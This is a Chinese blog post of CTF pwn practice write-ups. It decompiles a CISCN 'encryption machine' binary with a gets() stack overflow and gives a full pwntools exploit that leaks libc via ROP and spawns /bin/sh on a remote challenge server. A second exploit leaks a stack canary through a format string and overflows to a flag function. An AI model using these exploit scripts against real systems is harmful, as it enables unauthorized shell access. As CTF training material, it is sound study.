暑假pwn训练 第(十一)国赛pwn

最新推荐文章于 2024-04-20 15:46:56 发布
最新推荐文章于 2024-04-20 15:46:56 发布
阅读量998 收藏 1
点赞数 2
分类专栏: 学习 文章标签: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37433000/article/details/99684104
版权

昨天做了几道pwn题emem
今天也做了2道表示pwn好难被打自闭了…
昨天重新做了一下国赛的pwn题发现好像能做几道…当时的自己也是真的菜~~
pwn1就是常规思路泄露libc然后getshell

// local variable allocation has failed, the output may be wrong!
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int v4; // [rsp+Ch] [rbp-4h]

  init(*(_QWORD *)&argc, argv, envp);
  puts("EEEEEEE                            hh      iii                ");
  puts("EE      mm mm mmmm    aa aa   cccc hh          nn nnn    eee  ");
  puts("EEEEE   mmm  mm  mm  aa aaa cc     hhhhhh  iii nnn  nn ee   e ");
  puts("EE      mmm  mm  mm aa  aaa cc     hh   hh iii nn   nn eeeee  ");
  puts("EEEEEEE mmm  mm  mm  aaa aa  ccccc hh   hh iii nn   nn  eeeee ");
  puts("====================================================================");
  puts("Welcome to this Encryption machine\n");
  begin("Welcome to this Encryption machine\n");
  while ( 1 )
  {
    while ( 1 )
    {
      fflush(0LL);
      v4 = 0;
      __isoc99_scanf("%d", &v4);
      getchar();
      if ( v4 != 2 )
        break;
      puts("I think you can do it by yourself");
      begin("I think you can do it by yourself");
    }
    if ( v4 == 3 )
    {
      puts("Bye!");
      return 0;
    }
    if ( v4 != 1 )
      break;
    encrypt();
    begin("%d");
  }
  puts("Something Wrong!");
  return 0;
}

是一个表单的pwn我们进入加密函数

int encrypt()
{
  size_t v0; // rbx
  char s[48]; // [rsp+0h] [rbp-50h]
  __int16 v3; // [rsp+30h] [rbp-20h]

  memset(s, 0, sizeof(s));
  v3 = 0;
  puts("Input your Plaintext to be encrypted");
  gets(s);
  while ( 1 )
  {
    v0 = (unsigned int)x;
    if ( v0 >= strlen(s) )
      break;
    if ( s[x] <= 96 || s[x] > 122 )
    {
      if ( s[x] <= 64 || s[x] > 90 )
      {
        if ( s[x] > 47 && s[x] <= 57 )
          s[x] ^= 0xFu;
      }
      else
      {
        s[x] ^= 0xEu;
      }
    }
    else
    {
      s[x] ^= 0xDu;
    }
    ++x;
  }
  puts("Ciphertext");
  return puts(s);
}

很明显的缓冲区溢出漏洞只是传上去会被加密所以我们把其用同样方式异或一下就会出来了然后泄露libc找system地址,找’/bin/sh’,或者用one_gadget(这个我没有试)…
泄露的函数的话有puts就直接用它呗
直接上exp:

from pwn import *
libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
p=remote('pwn.buuoj.cn',20123)
main_addr = 0x000000000400B28
pop_rdi_addr = 0x0000000000400c83
offset=0x50+8
elf=ELF('./ciscn1')
p.recvuntil('your choice!')
p.sendline('1')
p.recvuntil('be encrypted')
payload='a'*offset+p64(pop_rdi_addr)+p64(elf.got['puts'])
payload+=p64(elf.plt['puts'])+p64(main_addr)
payload_change=''
for x in payload:
	if ord(x)<=96 or ord(x)>122:
		if ord(x)<=64 or ord(x)>90:
			if ord(x)>47 and ord(x)<=57:
				x=chr(ord(x)^0xf)
		else:
			x=chr(ord(x)^0xe)
	else:
		x=chr(ord(x)^0xd)
	payload_change+=x
print payload_change
p.sendline(payload_change)
p.recvuntil('Ciphertext\n')
p.recvuntil('\n',drop=True)
put_addr=u64(p.recvuntil('\n',drop=True)+"\x00\x00")  #这里用DEBUG调试可知
print put_addr
#getshell

libcbase=put_addr-libc.symbols['puts']
system_addr=libcbase+libc.symbols['system']
bin_sh=libcbase+libc.search("/bin/sh").next()

payload2='a'*offset+p64(pop_rdi_addr)+p64(bin_sh)+p64(system_addr)

p.recvuntil('your choice!')
p.sendline('1')
p.recvuntil('be encrypted')
p.sendline(payload2)

p.interactive()

emem这么简单没做出来~~
然后就是记不清是哪个网站上的一道题目好像先是用格式化字符串泄露cannary然后直接栈溢出

#coding:utf-8
#canary与我们输入参数的偏移为0x90 - 8 = 0x88,然后八个字节为一组,0x88 / 8 = 17,17 + 6 = 23
from pwn import *

#context.log_level = 'debug'

#p = process('./mark')
p=remote('111.198.29.45',54792)

#leak canary
p.recvuntil('3. Exit the battle')
p.sendline('2')
p.sendline("%23$p")
p.recvuntil('0x')
canary=int(p.recv(16),16)


#getshell

flag_addr=0x04008DA
p.sendline('1')
payload='a'*0x88
payload+=p64(canary)
payload+='b'*8
payload+=p64(flag_addr)
p.sendline(payload)
p.interactive()

哇哇pwn好难

doudoudedi
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
buu-[MRCTF2020]Transform
qaq517384的博客
03-01 450
64位 看一眼程序 没用,过了 64位ida打开 // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rdx __int64 v4; // rdx char v6[104]; // [rsp+20h] [rbp-70h] int j; // [rs
[buuctf][MRCTF2020]Transform
逆向萌新的博客
07-02 489
[MRCTF2020]Transform
BUUCTF 逆向工程(reverse)之[MRCTF2020]Transform
weixin_44632787的博客
08-25 856
用IDA打开,进入到主函数 // local variable allocation has failed, the output may be wrong! int __cdecl main(int argc, const char **argv, const char **envp) { __int64 v3; // rdx __int64 v4; // rdx char v6[104]; // [rsp+20h] [rbp-70h] int j; // [rsp+88h] [rbp-8
[CISCN 2019东北]PWN2题解
最新发布
XJQ100717的博客
04-20 841
要学习的看过来
做的第一道pwn
LL021101的博客
03-20 1241
做题步骤 一、使用Ubuntu,对pwn文件进行扫瞄; file语句主要用来看本文件是多少位的,是不是elf文件——ELF文件详解—初步认识_code&poetry的博客-CSDN博客_elf文件,(该链接详细介绍了elf文件的基本结构),图中显示64-bit,意思是64位的文件 checksec命令是用来查看该文件有哪些保护措施。 NX(DEP):数据执行防护 Canary(FS):栈溢出保护 RELRO(ASLR):(地址随机化) PIE(代码地址随机化)...
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
browser_pwn:浏览器pwn,现在主要工作
03-22
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
pwn题目中的libc-2.27.so文件
04-11
pwn题,有些时候题目不给这个文件,这里是这个库的文件。
buuoj Pwn writeup 91-95
yongbaoii的博客
03-08 421
91 gyctf_2020_some_thing_exceting bnanana。 create 这是他整体的一个结构。 但是要注意的是它对申请!的chunk有要求,只能是fastbin大小的chunk。 modify 没啥用。 delete 还是没清理干净。 view函数 这里还有一个可以利用的函数。 那么这道题能够利用的就是一个uaf,还有他把flag写在了bss上面。有uaf就会有double free,那么我们可以考虑去把s通过fastbin_attack,申请回来,然后进行泄露flag。
刷题 - BUUCTF(BUUOJ) - PWN - DAY3
qq_36902977的博客
08-02 150
buuoj/buuctf pwn 刷题
pwn学习-BUUOJ(一)
qq_45653588的博客
12-20 421
文章目录0x00 test_your_nc0X01 rip0x02 warmup_csaw_20160x03 pwn1_sctf_20160x04 ciscn_2019_n_1 0x00 test_your_nc 下载文件查看,直接就给了shell,没什么好说的,直接连上就行了。 int __cdecl main(int argc, const char **argv, const char **envp) { system("/bin/sh"); return 0; } 0X01 rip 下载文
buuoj-Pwn-刷题记录
Do1phln的博客
10-30 311
warmup_csaw_2016 题目直接给出了函数位置,所以很明显就是要利用gets,gets参数的长度为0x40,所以我们再加上返回地址的8个字节,溢出的总长度为0x48,运行时候可以看出sub_40060D的地址就是它的名字,因此我们可以构建payload payload = b'a'*0x48+p64(0x40060D) 即可得到flag ciscn_2019_n_1 打开题目可知大致意思是main函数里面调用了一过func函数,其中要输入v1,但是要判断v2,所以就很明显是需要输入长字符串覆盖到
校赛writeup
热门推荐
Ni9htMar3的博客
12-26 1万+
第一届校赛 WEB MISC RE Crypto
今天你pwn了吗(上)
蚁景网安学院
05-07 4003
前言:"二进制太难了", 一起到 buu 开始 刷题吧。这里 仅记录 下 非高分题目的 解题思路和 知识讲解。特别是文章里的函数,我特意整理了下,还请好好学习下。test...
buuoj Pwn writeup 211-215
yongbaoii的博客
08-31 387
211 rootersctf_2019_babypwn 说白了就个栈溢出。 exp from pwn import* context.log_level = "debug" r = remote('node4.buuoj.cn', 27601) #r = process("./211") elf = ELF('./211') libc = ELF('./64/libc-2.27.so') puts_plt = elf.plt['puts'] puts_got = elf.got['puts']
Buuoj Pwn
VisualNull的博客
05-22 270
babyrop WP 一道比较简单的ret2libc 考察点为strlen函数遇到\x00返回 但是有一个坑 IDA逆向拿到伪代码 main函数 逻辑是程序开始运行时读入一个随机数 然后传给并调用sub_804871F函数 sub_804871F函数 a1为main函数传入的随机数(buff) 格式化后将a1给了s 之后从终端读入数据给buf 然后将数组buf的某个元素变为0(这是一个坑) 之后获取buf的长度(strlen函数) 这里是第一个利用..
Linux pwn零基础入门教程:环境配置到实战攻击
"i春秋月刊第六期的主题深入探讨了Linux pwn(Privilege Escalation,权限提升)的零基础入门教程。该系列由Tangerine@SAINTSEC作者撰写,历时三个月精心编撰,旨在解决新手在Linux环境下攻破安全挑战时遇到的难题,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值